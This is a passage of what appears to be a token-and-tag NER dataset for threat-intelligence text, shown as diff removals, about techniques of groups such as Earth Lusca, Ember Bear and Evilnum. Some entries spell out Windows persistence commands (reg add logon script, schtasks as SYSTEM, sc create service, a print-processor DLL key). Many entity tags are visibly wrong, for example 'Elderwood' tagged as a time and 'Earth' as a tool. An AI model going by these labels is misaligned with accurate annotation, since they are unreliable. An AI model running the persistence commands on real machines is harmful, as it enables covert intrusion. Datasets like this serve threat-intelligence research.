- "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "placed", - "a", - "malicious", - "payload", - "in", - "`%WINDIR%\\SYSTEM32\\oci.dll`", - "so", - "it", - "would", - "be", - "sideloaded", - "by", - "the", - "MSDTC", - "service." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "certutil", - "to", - "decode", - "a", - "string", - "into", - "a", - "cabinet", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "Nltest", - "to", - "obtain", - "information", - "about", - "domain", - "controllers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "registered", - "domains,", - "intended", - "to", - "look", - "like", - "legitimate", - "target", - "domains,", - "that", - "have", - "been", - "used", - "in", - "watering", - "hole", - "attacks." - ], - "ner_tags": [ - "I-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "performed", - "watering", - "hole", - "attacks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Org", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "the", - "megacmd", - "tool", - "to", - "upload", - "stolen", - "files", - "from", - "a", - "victim", - "network", - "to", - "MEGA." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Area" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "compromised", - "victims", - "by", - "directly", - "exploiting", - "vulnerabilities", - "of", - "public-facing", - "servers,", - "including", - "those", - "associated", - "with", - "Microsoft", - "Exchange", - "and", - "Oracle", - "GlassFish." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "Mimikatz", - "to", - "exploit", - "a", - "domain", - "controller", - "via", - "the", - "ZeroLogon", - "exploit", - "(CVE-2020-1472)." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "manipulated", - "legitimate", - "websites", - "to", - "inject", - "malicious", - "JavaScript", - "code", - "as", - "part", - "of", - "their", - "watering", - "hole", - "operations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "ProcDump", - "to", - "obtain", - "the", - "hashes", - "of", - "credentials", - "by", - "dumping", - "the", - "memory", - "of", - "the", - "LSASS", - "process." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "required", - "users", - "to", - "click", - "on", - "a", - "malicious", - "file", - "for", - "the", - "loader", - "to", - "activate." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "sent", - "spearphishing", - "emails", - "that", - "required", - "the", - "user", - "to", - "click", - "on", - "a", - "malicious", - "link", - "and", - "subsequently", - "open", - "a", - "decoy", - "document", - "with", - "a", - "malicious", - "loader." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "acquired", - "and", - "used", - "a", - "variety", - "of", - "malware,", - "including", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "the", - "command", - "`move", - "[file", - "path]", - "c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll`", - "to", - "move", - "and", - "register", - "a", - "malicious", - "DLL", - "name", - "as", - "a", - "Windows", - "print", - "processor,", - "which", - "eventually", - "was", - "loaded", - "by", - "the", - "Print", - "Spooler", - "service." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "modified", - "the", - "registry", - "using", - "the", - "command", - "<code>reg", - "add", - "“HKEY_CURRENT_USER\\Environment”", - "/v", - "UserInitMprLogonScript", - "/t", - "REG_SZ", - "/d", - "“[file", - "path]”</code>", - "for", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "`mshta.exe`", - "to", - "load", - "an", - "HTA", - "script", - "within", - "a", - "malicious", - ".LNK", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "Base64", - "to", - "encode", - "strings." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "PowerShell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "added", - "the", - "Registry", - "key", - "`HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows", - "x64\\Print", - "Processors\\UDPrint”", - "/v", - "Driver", - "/d", - "“spool.dll", - "/f`", - "to", - "load", - "malware", - "as", - "a", - "Print", - "Processor." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "Tasklist", - "to", - "obtain", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "adopted", - "Cloudflare", - "as", - "a", - "proxy", - "for", - "compromised", - "servers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "Python", - "scripts", - "for", - "port", - "scanning", - "or", - "building", - "reverse", - "shells." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "the", - "command", - "<code>powershell", - "“Get-EventLog", - "-LogName", - "security", - "-Newest", - "500", - "|", - "where", - "{$_.EventID", - "-eq", - "4624}", - "|", - "format-list", - "-", - "property", - "*", - "|", - "findstr", - "“Address””</code>", - "to", - "find", - "the", - "network", - "information", - "of", - "successfully", - "logged-in", - "accounts", - "to", - "discovery", - "addresses", - "of", - "other", - "machines.", - "Earth", - "Lusca", - "has", - "also", - "used", - "multiple", - "scanning", - "tools", - "to", - "discover", - "other", - "machines", - "within", - "the", - "same", - "compromised", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "dropped", - "an", - "SSH-authorized", - "key", - "in", - "the", - "`/root/.ssh`", - "folder", - "in", - "order", - "to", - "access", - "a", - "compromised", - "server", - "with", - "SSH." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "the", - "command", - "<code>schtasks", - "/Create", - "/SC", - "ONLOgon", - "/TN", - "WindowsUpdateCheck", - "/TR", - "“[file", - "path]”", - "/ru", - "system</code>", - "for", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "acquired", - "multiple", - "servers", - "for", - "some", - "of", - "their", - "operations,", - "using", - "each", - "server", - "for", - "a", - "different", - "role." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "compromised", - "web", - "servers", - "as", - "part", - "of", - "their", - "operational", - "infrastructure." - ], - "ner_tags": [ - "I-HackOrg", - "B-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "sent", - "spearphishing", - "emails", - "to", - "potential", - "targets", - "that", - "contained", - "a", - "malicious", - "link." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "steganography", - "to", - "hide", - "shellcode", - "in", - "a", - "BMP", - "image", - "file." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "the", - "command", - "<code>ipconfig</code>", - "to", - "obtain", - "information", - "about", - "network", - "configurations." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "employed", - "a", - "PowerShell", - "script", - "called", - "RDPConnectionParser", - "to", - "read", - "and", - "filter", - "the", - "Windows", - "event", - "log", - "“Microsoft-Windows-TerminalServices-RDPClient/Operational”", - "(Event", - "ID", - "1024)", - "to", - "obtain", - "network", - "information", - "from", - "RDP", - "connections.", - "Earth", - "Lusca", - "has", - "also", - "used", - "netstat", - "from", - "a", - "compromised", - "system", - "to", - "obtain", - "network", - "connection", - "information." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "collected", - "information", - "on", - "user", - "accounts", - "via", - "the", - "<code>whoami</code>", - "command." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "used", - "Tasklist", - "to", - "obtain", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "acquired", - "and", - "used", - "a", - "variety", - "of", - "open", - "source", - "tools." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "staged", - "malware", - "and", - "malicious", - "files", - "on", - "compromised", - "web", - "servers,", - "GitHub,", - "and", - "Google", - "Drive." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "VBA", - "scripts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "scanned", - "for", - "vulnerabilities", - "in", - "the", - "public-facing", - "servers", - "of", - "their", - "targets." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "established", - "GitHub", - "accounts", - "to", - "host", - "their", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "has", - "compromised", - "Google", - "Drive", - "repositories." - ], - "ner_tags": [ - "I-HackOrg", - "B-Exp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "used", - "a", - "VBA", - "script", - "to", - "execute", - "WMI." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Earth", - "Lusca", - "created", - "a", - "service", - "using", - "the", - "command", - "<code>sc", - "create", - "“SysUpdate”", - "binpath=", - "“cmd", - "/c", - "start", - "“[file", - "path]””&&sc", - "config", - "“SysUpdate”", - "start=", - "auto&&net", - "start", - "SysUpdate</code>", - "for", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "delivered", - "zero-day", - "exploits", - "and", - "malware", - "to", - "victims", - "by", - "injecting", - "malicious", - "code", - "into", - "specific", - "public", - "Web", - "pages", - "visited", - "by", - "targets", - "within", - "a", - "particular", - "sector." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "encrypted", - "documents", - "and", - "malicious", - "executables." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "used", - "exploitation", - "of", - "endpoint", - "software,", - "including", - "Microsoft", - "Internet", - "Explorer", - "Adobe", - "Flash", - "vulnerabilities,", - "to", - "gain", - "execution.", - "They", - "have", - "also", - "used", - "zero-day", - "exploits." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Exp", - "I-Tool", - "I-Tool", - "I-Exp", - "I-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Exp" - ] - }, - { - "tokens": [ - "The", - "Ritsol", - "backdoor", - "trojan", - "used", - "by", - "Elderwood", - "can", - "download", - "files", - "onto", - "a", - "compromised", - "host", - "from", - "a", - "remote", - "location." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "leveraged", - "multiple", - "types", - "of", - "spearphishing", - "in", - "order", - "to", - "attempt", - "to", - "get", - "a", - "user", - "to", - "open", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "leveraged", - "multiple", - "types", - "of", - "spearphishing", - "in", - "order", - "to", - "attempt", - "to", - "get", - "a", - "user", - "to", - "open", - "links." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "packed", - "malware", - "payloads", - "before", - "delivery", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "delivered", - "zero-day", - "exploits", - "and", - "malware", - "to", - "victims", - "via", - "targeted", - "emails", - "containing", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Elderwood", - "has", - "delivered", - "zero-day", - "exploits", - "and", - "malware", - "to", - "victims", - "via", - "targeted", - "emails", - "containing", - "a", - "link", - "to", - "malicious", - "content", - "hosted", - "on", - "an", - "uncommon", - "Web", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "added", - "extra", - "spaces", - "between", - "JavaScript", - "code", - "characters", - "to", - "increase", - "the", - "overall", - "file", - "size." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "stolen", - "certificates", - "from", - "Electrum", - "Technologies", - "GmbH", - "to", - "sign", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-OffAct", - "O", - "O", - "B-Org", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "stolen", - "legitimate", - "certificates", - "to", - "sign", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "obfuscated", - "malicious", - "scripts", - "to", - "help", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "control", - "panel", - "files", - "(CPL),", - "delivered", - "via", - "e-mail,", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "executed", - "a", - "batch", - "script", - "designed", - "to", - "disable", - "Windows", - "Defender", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerability", - "CVE-2017-11882." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "tools", - "to", - "download", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "JavaScript", - "to", - "execute", - "malicious", - "code", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "executing", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "attempted", - "to", - "lure", - "users", - "to", - "click", - "on", - "a", - "malicious", - "link", - "within", - "a", - "spearphishing", - "email." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "an", - "open", - "source", - "batch", - "script", - "to", - "modify", - "Windows", - "Defender", - "registry", - "keys." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "obfuscated", - "malware", - "to", - "help", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "PowerShell", - "to", - "download", - "and", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "packed", - "malware", - "to", - "help", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "attachments", - "in", - "the", - "form", - "of", - "PDFs,", - "Word", - "documents,", - "JavaScript", - "files,", - "and", - "Control", - "Panel", - "File", - "(CPL)", - "executables." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "links." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "obtained", - "and", - "used", - "open", - "source", - "scripts", - "from", - "GitHub." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "has", - "used", - "Discord's", - "content", - "delivery", - "network", - "(CDN)", - "to", - "deliver", - "malware", - "and", - "malicious", - "scripts", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ember", - "Bear", - "had", - "used", - "`cmd.exe`", - "and", - "Windows", - "Script", - "Host", - "(wscript)", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Equation", - "is", - "known", - "to", - "have", - "the", - "capability", - "to", - "overwrite", - "the", - "firmware", - "on", - "hard", - "drives", - "from", - "some", - "manufacturers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Equation", - "has", - "been", - "observed", - "utilizing", - "environmental", - "keying", - "in", - "payload", - "delivery." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Equation", - "has", - "used", - "an", - "encrypted", - "virtual", - "file", - "system", - "stored", - "in", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Equation", - "has", - "used", - "tools", - "with", - "the", - "functionality", - "to", - "search", - "for", - "specific", - "information", - "about", - "the", - "attached", - "hard", - "drive", - "that", - "could", - "be", - "used", - "to", - "identify", - "and", - "overwrite", - "the", - "firmware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "used", - "PowerShell", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "can", - "collect", - "email", - "credentials", - "from", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "used", - "the", - "malware", - "variant,", - "TerraTV,", - "to", - "load", - "a", - "malicious", - "DLL", - "placed", - "in", - "the", - "TeamViewer", - "directory,", - "instead", - "of", - "the", - "original", - "Windows", - "DLL", - "located", - "in", - "a", - "system", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "deleted", - "files", - "used", - "during", - "infection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "can", - "deploy", - "additional", - "components", - "or", - "tools", - "as", - "needed." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Evilnum", - "has", - "used", - "malicious", - "JavaScript", - "files", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - 